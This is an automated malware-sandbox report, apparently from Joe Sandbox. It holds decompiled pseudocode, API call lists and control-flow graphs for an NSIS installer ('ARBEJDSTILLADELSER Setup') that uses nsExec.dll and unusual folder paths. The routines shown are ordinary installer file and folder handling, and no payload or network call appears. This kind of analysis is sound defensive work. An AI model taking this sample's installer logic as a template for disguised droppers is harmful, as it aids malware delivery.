                                                                                                                                                                              							}
                                                                                                                                                                              							L42:
                                                                                                                                                                              							_t87 =  &(_t87[lstrlenA(_t87)]);
                                                                                                                                                                              							_t37 = 0x42e3c0;
                                                                                                                                                                              							continue;
                                                                                                                                                                              						}
                                                                                                                                                                              						__eflags = _t94 - 0x1d;
                                                                                                                                                                              						if(_t94 != 0x1d) {
                                                                                                                                                                              							__eflags = (_t94 << 0xa) + 0x430000;
                                                                                                                                                                              							E00406257(_t87, (_t94 << 0xa) + 0x430000);
                                                                                                                                                                              						} else {
                                                                                                                                                                              							E004061B5(_t87,  *0x42f428);
                                                                                                                                                                              						}
                                                                                                                                                                              						__eflags = _t94 + 0xffffffeb - 7;
                                                                                                                                                                              						if(_t94 + 0xffffffeb < 7) {
                                                                                                                                                                              							L33:
                                                                                                                                                                              							E00406535(_t87);
                                                                                                                                                                              						}
                                                                                                                                                                              						goto L42;
                                                                                                                                                                              					}
                                                                                                                                                                              					__eflags =  *0x42f4dc;
                                                                                                                                                                              					_t96 = 2;
                                                                                                                                                                              					if( *0x42f4dc != 0) {
                                                                                                                                                                              						L13:
                                                                                                                                                                              						_a8 = 1;
                                                                                                                                                                              						L14:
                                                                                                                                                                              						__eflags =  *0x42f4a4;
                                                                                                                                                                              						if( *0x42f4a4 != 0) {
                                                                                                                                                                              							_t96 = 4;
                                                                                                                                                                              						}
                                                                                                                                                                              						__eflags = _t77;
                                                                                                                                                                              						if(__eflags >= 0) {
                                                                                                                                                                              							__eflags = _t77 - 0x25;
                                                                                                                                                                              							if(_t77 != 0x25) {
                                                                                                                                                                              								__eflags = _t77 - 0x24;
                                                                                                                                                                              								if(_t77 == 0x24) {
                                                                                                                                                                              									GetWindowsDirectoryA(_t87, 0x400);
                                                                                                                                                                              									_t96 = 0;
                                                                                                                                                                              								}
                                                                                                                                                                              								while(1) {
                                                                                                                                                                              									__eflags = _t96;
                                                                                                                                                                              									if(_t96 == 0) {
                                                                                                                                                                              										goto L30;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t50 =  *0x42f424;
                                                                                                                                                                              									_t96 = _t96 - 1;
                                                                                                                                                                              									__eflags = _t50;
                                                                                                                                                                              									if(_t50 == 0) {
                                                                                                                                                                              										L26:
                                                                                                                                                                              										_t52 = SHGetSpecialFolderLocation( *0x42f428,  *(_t97 + _t96 * 4 - 0x18),  &_v8);
                                                                                                                                                                              										__eflags = _t52;
                                                                                                                                                                              										if(_t52 != 0) {
                                                                                                                                                                              											L28:
                                                                                                                                                                              											 *_t87 =  *_t87 & 0x00000000;
                                                                                                                                                                              											__eflags =  *_t87;
                                                                                                                                                                              											continue;
                                                                                                                                                                              										}
                                                                                                                                                                              										__imp__SHGetPathFromIDListA(_v8, _t87);
                                                                                                                                                                              										_v12 = _t52;
                                                                                                                                                                              										__imp__CoTaskMemFree(_v8);
                                                                                                                                                                              										__eflags = _v12;
                                                                                                                                                                              										if(_v12 != 0) {
                                                                                                                                                                              											goto L30;
                                                                                                                                                                              										}
                                                                                                                                                                              										goto L28;
                                                                                                                                                                              									}
                                                                                                                                                                              									__eflags = _a8;
                                                                                                                                                                              									if(_a8 == 0) {
                                                                                                                                                                              										goto L26;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t54 =  *_t50( *0x42f428,  *(_t97 + _t96 * 4 - 0x18), 0, 0, _t87); // executed
                                                                                                                                                                              									__eflags = _t54;
                                                                                                                                                                              									if(_t54 == 0) {
                                                                                                                                                                              										goto L30;
                                                                                                                                                                              									}
                                                                                                                                                                              									goto L26;
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L30;
                                                                                                                                                                              							}
                                                                                                                                                                              							GetSystemDirectoryA(_t87, 0x400);
                                                                                                                                                                              							goto L30;
                                                                                                                                                                              						} else {
                                                                                                                                                                              							E0040613E((_t77 & 0x0000003f) +  *0x42f458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t77 & 0x0000003f) +  *0x42f458, _t87, _t77 & 0x00000040); // executed
                                                                                                                                                                              							__eflags =  *_t87;
                                                                                                                                                                              							if( *_t87 != 0) {
                                                                                                                                                                              								L31:
                                                                                                                                                                              								__eflags = _v16 - 0x1a;
                                                                                                                                                                              								if(_v16 == 0x1a) {
                                                                                                                                                                              									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L33;
                                                                                                                                                                              							}
                                                                                                                                                                              							E004062EA(_t63, _t87, _t96, _t87, _v16);
                                                                                                                                                                              							L30:
                                                                                                                                                                              							__eflags =  *_t87;
                                                                                                                                                                              							if( *_t87 == 0) {
                                                                                                                                                                              								goto L33;
                                                                                                                                                                              							}
                                                                                                                                                                              							goto L31;
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              					__eflags =  *0x42f4de - 0x45a;
                                                                                                                                                                              					if( *0x42f4de >= 0x45a) {
                                                                                                                                                                              						goto L13;
                                                                                                                                                                              					}
                                                                                                                                                                              					__eflags = _t39 - 0x23;
                                                                                                                                                                              					if(_t39 == 0x23) {
                                                                                                                                                                              						goto L13;
                                                                                                                                                                              					}
                                                                                                                                                                              					__eflags = _t39 - 0x2e;
                                                                                                                                                                              					if(_t39 == 0x2e) {
                                                                                                                                                                              						goto L13;
                                                                                                                                                                              					}
                                                                                                                                                                              					_a8 = _a8 & 0x00000000;
                                                                                                                                                                              					goto L14;
                                                                                                                                                                              				}
                                                                                                                                                                              				 *_t87 =  *_t87 & 0x00000000;
                                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                                              					return _t37;
                                                                                                                                                                              				}
                                                                                                                                                                              				return E00406257(_a4, _t37);
                                                                                                                                                                              			}


























                                                                                                                                                                              0x004064aa
                                                                                                                                                                              0x004064ab
                                                                                                                                                                              0x004064ab
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004064e1
                                                                                                                                                                              0x00406398
                                                                                                                                                                              0x004063a1
                                                                                                                                                                              0x004063a2
                                                                                                                                                                              0x004063bf
                                                                                                                                                                              0x004063bf
                                                                                                                                                                              0x004063c6
                                                                                                                                                                              0x004063c6
                                                                                                                                                                              0x004063cd
                                                                                                                                                                              0x004063d1
                                                                                                                                                                              0x004063d1
                                                                                                                                                                              0x004063d2
                                                                                                                                                                              0x004063d4
                                                                                                                                                                              0x0040640d
                                                                                                                                                                              0x00406410
                                                                                                                                                                              0x00406420
                                                                                                                                                                              0x00406423
                                                                                                                                                                              0x0040642b
                                                                                                                                                                              0x00406431
                                                                                                                                                                              0x00406431
                                                                                                                                                                              0x00406490
                                                                                                                                                                              0x00406490
                                                                                                                                                                              0x00406492
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406435
                                                                                                                                                                              0x0040643c
                                                                                                                                                                              0x0040643d
                                                                                                                                                                              0x0040643f
                                                                                                                                                                              0x00406459
                                                                                                                                                                              0x00406467
                                                                                                                                                                              0x0040646d
                                                                                                                                                                              0x0040646f
                                                                                                                                                                              0x0040648d
                                                                                                                                                                              0x0040648d
                                                                                                                                                                              0x0040648d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040648d
                                                                                                                                                                              0x00406475
                                                                                                                                                                              0x0040647e
                                                                                                                                                                              0x00406481
                                                                                                                                                                              0x00406487
                                                                                                                                                                              0x0040648b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040648b
                                                                                                                                                                              0x00406441
                                                                                                                                                                              0x00406444
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406453
                                                                                                                                                                              0x00406455
                                                                                                                                                                              0x00406457
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406457
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406490
                                                                                                                                                                              0x00406418
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004063d6
                                                                                                                                                                              0x004063f1
                                                                                                                                                                              0x004063f6
                                                                                                                                                                              0x004063f9
                                                                                                                                                                              0x00406499
                                                                                                                                                                              0x00406499
                                                                                                                                                                              0x0040649d
                                                                                                                                                                              0x004064a5
                                                                                                                                                                              0x004064a5
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040649d
                                                                                                                                                                              0x00406403
                                                                                                                                                                              0x00406494
                                                                                                                                                                              0x00406494
                                                                                                                                                                              0x00406497
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406497
                                                                                                                                                                              0x004063d4
                                                                                                                                                                              0x004063a4
                                                                                                                                                                              0x004063ad
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004063af
                                                                                                                                                                              0x004063b2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004063b4
                                                                                                                                                                              0x004063b7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004063b9
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004063b9
                                                                                                                                                                              0x0040651c
                                                                                                                                                                              0x00406526
                                                                                                                                                                              0x00406532
                                                                                                                                                                              0x00406532
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00406418
                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(ExecToStack,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,004053B0,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000), ref: 0040642B
                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(004053B0,0 v,?,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,004053B0,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000), ref: 00406467
                                                                                                                                                                              • SHGetPathFromIDListA.SHELL32(0 v,ExecToStack), ref: 00406475
                                                                                                                                                                              • CoTaskMemFree.OLE32(0040A198), ref: 00406481
                                                                                                                                                                              • lstrcatA.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 004064A5
                                                                                                                                                                              • lstrlenA.KERNEL32(ExecToStack,?,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,004053B0,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00000000,00422E48,7620EA30), ref: 004064F7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                              • String ID: 0 v$ExecToStack$H.B0 v$Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                              • API String ID: 717251189-1308106946
                                                                                                                                                                              • Opcode ID: a2f56f6d0f1162f5eaac14cd87f867bf1e8ae6f6d2175ce0c13bbb87bd24daf5
                                                                                                                                                                              • Instruction ID: b52c447f78294e1834a117c6ffbc2f7508752916544efe1487e33f4ad7b91c7d
                                                                                                                                                                              • Opcode Fuzzy Hash: a2f56f6d0f1162f5eaac14cd87f867bf1e8ae6f6d2175ce0c13bbb87bd24daf5
                                                                                                                                                                              • Instruction Fuzzy Hash: 53612270900110AFDF20AF24DD90B7E3BA8AB15318F52403FE903BA2D1C67C99A6DB5D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

C-Code - Quality: 61%
E00401759(FILETIME* __ebx, void* __eflags) {
	void* _t33;
	void* _t41;
	void* _t43;
	FILETIME* _t49;
	FILETIME* _t62;
	void* _t64;
	signed int _t70;
	FILETIME* _t71;
	FILETIME* _t75;
	signed int _t77;
	void* _t80;
	CHAR* _t82;
	CHAR* _t83;
	void* _t85;

	_t75 = __ebx;
	_t82 = E00402C39(0x31);
	 *(_t85 - 8) = _t82;
	 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
	_t33 = E00405C56(_t82);
	_push(_t82);
	_t83 = "ExecToStack";
	if(_t33 == 0) {
		lstrcatA(E00405BE9(E00406257(_t83, "C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens\\Lektionskatalogets1")), ??);
	} else {
		E00406257();
	}
	E00406535(_t83);
	while(1) {
		__eflags =  *(_t85 + 8) - 3;
		if( *(_t85 + 8) >= 3) {
			_t64 = E004065CE(_t83);
			_t77 = 0;
			__eflags = _t64 - _t75;
			if(_t64 != _t75) {
				_t71 = _t64 + 0x14;
				__eflags = _t71;
				_t77 = CompareFileTime(_t71, _t85 - 0x1c);
			}
			asm("sbb eax, eax");
			_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
			__eflags = _t70;
			 *(_t85 + 8) = _t70;
		}
		__eflags =  *(_t85 + 8) - _t75;
		if( *(_t85 + 8) == _t75) {
			E00405DC5(_t83);
		}
		__eflags =  *(_t85 + 8) - 1;
		_t41 = E00405DEA(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
		__eflags = _t41 - 0xffffffff;
		 *(_t85 - 0xc) = _t41;
		if(_t41 != 0xffffffff) {
			break;
		}
		__eflags =  *(_t85 + 8) - _t75;
		if( *(_t85 + 8) != _t75) {
			E00405378(0xffffffe2,  *(_t85 - 8));
			__eflags =  *(_t85 + 8) - 2;
			if(__eflags == 0) {
				 *((intOrPtr*)(_t85 - 4)) = 1;
			}
			L31:
			 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t85 - 4));
			__eflags =  *0x42f4a8;
			goto L32;
		} else {
			E00406257(0x40ac38, 0x430000);
			E00406257(0x430000, _t83);
			E004062EA(_t75, 0x40ac38, _t83, "C:\Users\hardz\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll",  *((intOrPtr*)(_t85 - 0x14)));
			E00406257(0x430000, 0x40ac38);
			_t62 = E0040596D("C:\Users\hardz\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll",  *(_t85 - 0x28) >> 3) - 4;
			__eflags = _t62;
			if(_t62 == 0) {
				continue;
			} else {
				__eflags = _t62 == 1;
				if(_t62 == 1) {
					 *0x42f4a8 =  &( *0x42f4a8->dwLowDateTime);
					L32:
					_t49 = 0;
					__eflags = 0;
				} else {
					_push(_t83);
					_push(0xfffffffa);
					E00405378();
					L29:
					_t49 = 0x7fffffff;
				}
			}
		}
		L33:
		return _t49;
	}
	E00405378(0xffffffea,  *(_t85 - 8)); // executed
	 *0x42f4d4 =  *0x42f4d4 + 1;
	_push(_t75);
	_push(_t75);
	_push( *(_t85 - 0xc));
	_push( *((intOrPtr*)(_t85 - 0x20)));
	_t43 = E00403143(); // executed
	 *0x42f4d4 =  *0x42f4d4 - 1;
	__eflags =  *(_t85 - 0x1c) - 0xffffffff;
	_t80 = _t43;
	if( *(_t85 - 0x1c) != 0xffffffff) {
		L22:
		SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
	} else {
		__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
		if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
			goto L22;
		}
	}
	FindCloseChangeNotification( *(_t85 - 0xc)); // executed
	__eflags = _t80 - _t75;
	if(_t80 >= _t75) {
		goto L31;
	} else {
		__eflags = _t80 - 0xfffffffe;
		if(_t80 != 0xfffffffe) {
			E004062EA(_t75, _t80, _t83, _t83, 0xffffffee);
		} else {
			E004062EA(_t75, _t80, _t83, _t83, 0xffffffe9);
			lstrcatA(_t83,  *(_t85 - 8));
		}
		_push(0x200010);
		_push(_t83);
		E0040596D();
		goto L29;
	}
	goto L33;
}

















                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040180d
                                                                                                                                                                              0x00401813
                                                                                                                                                                              0x0040181e
                                                                                                                                                                              0x0040182b
                                                                                                                                                                              0x00401836
                                                                                                                                                                              0x0040184c
                                                                                                                                                                              0x0040184c
                                                                                                                                                                              0x0040184f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00401855
                                                                                                                                                                              0x00401855
                                                                                                                                                                              0x00401856
                                                                                                                                                                              0x00401873
                                                                                                                                                                              0x00402ace
                                                                                                                                                                              0x00402ace
                                                                                                                                                                              0x00402ace
                                                                                                                                                                              0x00401858
                                                                                                                                                                              0x00401858
                                                                                                                                                                              0x00401859
                                                                                                                                                                              0x00401492
                                                                                                                                                                              0x0040238f
                                                                                                                                                                              0x0040238f
                                                                                                                                                                              0x0040238f
                                                                                                                                                                              0x00401856
                                                                                                                                                                              0x0040184f
                                                                                                                                                                              0x00402ad0
                                                                                                                                                                              0x00402ad4
                                                                                                                                                                              0x00402ad4
                                                                                                                                                                              0x00401883
                                                                                                                                                                              0x00401888
                                                                                                                                                                              0x0040188e
                                                                                                                                                                              0x0040188f
                                                                                                                                                                              0x00401890
                                                                                                                                                                              0x00401893
                                                                                                                                                                              0x00401896
                                                                                                                                                                              0x0040189b
                                                                                                                                                                              0x004018a1
                                                                                                                                                                              0x004018a5
                                                                                                                                                                              0x004018a7
                                                                                                                                                                              0x004018af
                                                                                                                                                                              0x004018bb
                                                                                                                                                                              0x004018a9
                                                                                                                                                                              0x004018a9
                                                                                                                                                                              0x004018ad
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004018ad
                                                                                                                                                                              0x004018c4
                                                                                                                                                                              0x004018ca
                                                                                                                                                                              0x004018cc
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004018d2
                                                                                                                                                                              0x004018d2
                                                                                                                                                                              0x004018d5
                                                                                                                                                                              0x004018ed
                                                                                                                                                                              0x004018d7
                                                                                                                                                                              0x004018da
                                                                                                                                                                              0x004018e3
                                                                                                                                                                              0x004018e3
                                                                                                                                                                              0x004018f2
                                                                                                                                                                              0x004018f7
                                                                                                                                                                              0x0040238a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040238a
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00000400,00403556,ARBEJDSTILLADELSER Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                                                                                                                                                • Part of subcall function 00405378: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                                                                                                                                • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                                                                                                                                • Part of subcall function 00405378: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30), ref: 004053D4
                                                                                                                                                                                • Part of subcall function 00405378: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll), ref: 004053E6
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp$C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll$C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1$ExecToStack
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 641 405378-40538d 642 405443-405447 641->642 643 405393-4053a5 641->643 644 4053b0-4053bc lstrlenA 643->644 645 4053a7-4053ab call 4062ea 643->645 647 4053d9-4053dd 644->647 648 4053be-4053ce lstrlenA 644->648 645->644 650 4053ec-4053f0 647->650 651 4053df-4053e6 SetWindowTextA 647->651 648->642 649 4053d0-4053d4 lstrcatA 648->649 649->647 652 4053f2-405434 SendMessageA * 3 650->652 653 405436-405438 650->653 651->650 652->653 653->642 654 40543a-40543d 653->654 654->642
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405378(CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                              				CHAR* _v32;
                                                                                                                                                                              				long _v44;
                                                                                                                                                                              				int _v48;
                                                                                                                                                                              				void* _v52;
                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                              				void* __edi;
                                                                                                                                                                              				void* __esi;
                                                                                                                                                                              				CHAR* _t26;
                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                              				CHAR* _t28;
                                                                                                                                                                              				long _t29;
                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                              
                                                                                                                                                                              				_t26 =  *0x42ec04; // 0x20378
                                                                                                                                                                              				_v8 = _t26;
                                                                                                                                                                              				if(_t26 != 0) {
                                                                                                                                                                              					_t27 =  *0x42f4d4;
                                                                                                                                                                              					_v12 = _t27;
                                                                                                                                                                              					_t39 = _t27 & 0x00000001;
                                                                                                                                                                              					if(_t39 == 0) {
                                                                                                                                                                              						E004062EA(0, _t39, 0x42a070, 0x42a070, _a4);
                                                                                                                                                                              					}
                                                                                                                                                                              					_t26 = lstrlenA(0x42a070);
                                                                                                                                                                              					_a4 = _t26;
                                                                                                                                                                              					if(_a8 == 0) {
                                                                                                                                                                              						L6:
                                                                                                                                                                              						if((_v12 & 0x00000004) == 0) {
                                                                                                                                                                              							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070); // executed
                                                                                                                                                                              						}
                                                                                                                                                                              						if((_v12 & 0x00000002) == 0) {
                                                                                                                                                                              							_v32 = 0x42a070;
                                                                                                                                                                              							_v52 = 1;
                                                                                                                                                                              							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
                                                                                                                                                                              							_v44 = 0;
                                                                                                                                                                              							_v48 = _t29 - _t39;
                                                                                                                                                                              							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
                                                                                                                                                                              							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
                                                                                                                                                                              						}
                                                                                                                                                                              						if(_t39 != 0) {
                                                                                                                                                                              							_t28 = _a4;
                                                                                                                                                                              							 *((char*)(_t28 + 0x42a070)) = 0;
                                                                                                                                                                              							return _t28;
                                                                                                                                                                              						}
                                                                                                                                                                              					} else {
                                                                                                                                                                              						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                                                                                                              						if(_t26 < 0x800) {
                                                                                                                                                                              							_t26 = lstrcatA(0x42a070, _a8);
                                                                                                                                                                              							goto L6;
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t26;
                                                                                                                                                                              			}


















                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                                                                                                                              • lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                                                                                                                              • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30), ref: 004053D4
                                                                                                                                                                              • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll), ref: 004053E6
                                                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll
